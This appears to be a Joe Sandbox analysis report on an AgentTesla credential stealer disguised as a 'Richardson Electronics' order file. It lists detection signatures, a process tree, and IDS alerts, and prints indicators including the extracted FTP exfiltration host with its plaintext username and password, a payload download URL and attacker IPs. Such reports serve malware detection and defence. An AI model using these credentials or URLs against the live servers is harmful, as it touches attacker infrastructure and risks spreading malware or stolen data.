Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Richardson Electronics, LTD. PRD10221301UUE.exe

Overview

General Information

Sample name:Richardson Electronics, LTD. PRD10221301UUE.exe
Analysis ID:1520579
MD5:a93062ea78a516e011dfd18d4c462c87
SHA1:3ce876b96600c4d0252c73fa97c4ed0764b29503
SHA256:3b799063aa6a0a79e4a160b4650dc3199ebe128d1a183de4591e03a0b29674f1
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Richardson Electronics, LTD. PRD10221301UUE.exe (PID: 2896 cmdline: "C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe" MD5: A93062EA78A516E011DFD18D4C462C87)
    • InstallUtil.exe (PID: 7164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Eggdjjrhey.exe (PID: 936 cmdline: "C:\Users\user\AppData\Roaming\Eggdjjrhey.exe" MD5: A93062EA78A516E011DFD18D4C462C87)
    • InstallUtil.exe (PID: 3748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Eggdjjrhey.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Roaming\Eggdjjrhey.exe" MD5: A93062EA78A516E011DFD18D4C462C87)
    • InstallUtil.exe (PID: 6092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.3390128191.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 44 entries
              SourceRuleDescriptionAuthorStrings
              8.2.Eggdjjrhey.exe.40d1180.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.6170000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  3.2.Eggdjjrhey.exe.3dd1180.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        Click to see the 12 entries

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Eggdjjrhey.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe, ProcessId: 2896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eggdjjrhey
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T16:01:10.113187+020020299271A Network Trojan was detected192.168.2.6497125.2.84.23621TCP
                        2024-09-27T16:01:24.660564+020020299271A Network Trojan was detected192.168.2.6497195.2.84.23621TCP
                        2024-09-27T16:01:33.445294+020020299271A Network Trojan was detected192.168.2.6497255.2.84.23621TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T16:01:04.569664+020020226401A Network Trojan was detected67.212.175.162443192.168.2.649710TCP
                        2024-09-27T16:01:18.477927+020020226401A Network Trojan was detected67.212.175.162443192.168.2.649715TCP
                        2024-09-27T16:01:27.465530+020020226401A Network Trojan was detected67.212.175.162443192.168.2.649724TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T16:01:04.569664+020020179621A Network Trojan was detected67.212.175.162443192.168.2.649710TCP
                        2024-09-27T16:01:18.477927+020020179621A Network Trojan was detected67.212.175.162443192.168.2.649715TCP
                        2024-09-27T16:01:27.465530+020020179621A Network Trojan was detected67.212.175.162443192.168.2.649724TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-27T16:01:10.736443+020028555421A Network Trojan was detected192.168.2.6497135.2.84.23660306TCP
                        2024-09-27T16:01:10.742226+020028555421A Network Trojan was detected192.168.2.6497135.2.84.23660306TCP
                        2024-09-27T16:01:25.283301+020028555421A Network Trojan was detected192.168.2.6497225.2.84.23660969TCP
                        2024-09-27T16:01:25.294359+020028555421A Network Trojan was detected192.168.2.6497225.2.84.23660969TCP
                        2024-09-27T16:01:34.057672+020028555421A Network Trojan was detected192.168.2.6497265.2.84.23649791TCP
                        2024-09-27T16:01:34.063546+020028555421A Network Trojan was detected192.168.2.6497265.2.84.23649791TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeReversingLabs: Detection: 28%
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeReversingLabs: Detection: 28%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeJoe Sandbox ML: detected
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeJoe Sandbox ML: detected
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49724 version: TLS 1.2
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202771883.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.0000000002739000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.0000000003847000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000029D7000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202771883.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.0000000002739000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.0000000003847000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000029D7000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060B5483h0_2_060B5280
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060B5483h0_2_060B5290
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060B4EF7h0_2_060B4B40
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060B4EF7h0_2_060B4B50
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060BC6A8h0_2_060BC5E9
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060BC6A8h0_2_060BC5F0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060D1C52h0_2_060D1D0B
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060D1C52h0_2_060D1B28
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then jmp 060D1C52h0_2_060D1B38
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_060D0B98
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_060D0BA0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_062AD710
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A3C6A8h3_2_05A3C5E9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A3C6A8h3_2_05A3C5F0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A34EF7h3_2_05A34B40
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A34EF7h3_2_05A34B50
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A35483h3_2_05A35280
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A35483h3_2_05A35290
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A51C52h3_2_05A51D0B
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A50CB7
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A50BA0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A50B98
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A51C52h3_2_05A51B28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05A51C52h3_2_05A51B38
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05C2D710
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B2C6A8h8_2_05B2C5F0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B2C6A8h8_2_05B2C5E9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B24EF7h8_2_05B24B50
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B24EF7h8_2_05B24B40
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B25483h8_2_05B25290
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B25483h8_2_05B25280
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B41C52h8_2_05B41D0B
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05B40CB7
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05B40BA0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05B40B98
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B41C52h8_2_05B41B38
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then jmp 05B41C52h8_2_05B41B28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_05D1D710

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49713 -> 5.2.84.236:60306
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49712 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49719 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49722 -> 5.2.84.236:60969
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49726 -> 5.2.84.236:49791
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49725 -> 5.2.84.236:21
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.6:49710
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.6:49710
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.6:49715
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.6:49715
                        Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.6:49724
                        Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.6:49724
                        Source: global trafficTCP traffic: 5.2.84.236 ports 60969,60306,1,2,49791,21
                        Source: global trafficTCP traffic: 192.168.2.6:49713 -> 5.2.84.236:60306
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                        Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                        Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                        Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.6:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /john/Teoecc.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                        Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                        Source: InstallUtil.exe, 00000002.00000002.2330100397.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.00000000028AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.00000000041F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000027AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/john/Teoecc.wav
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, Eggdjjrhey.exe.0.drString found in binary or memory: https://wymascensores.com/john/Teoecc.wav%Buffer
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
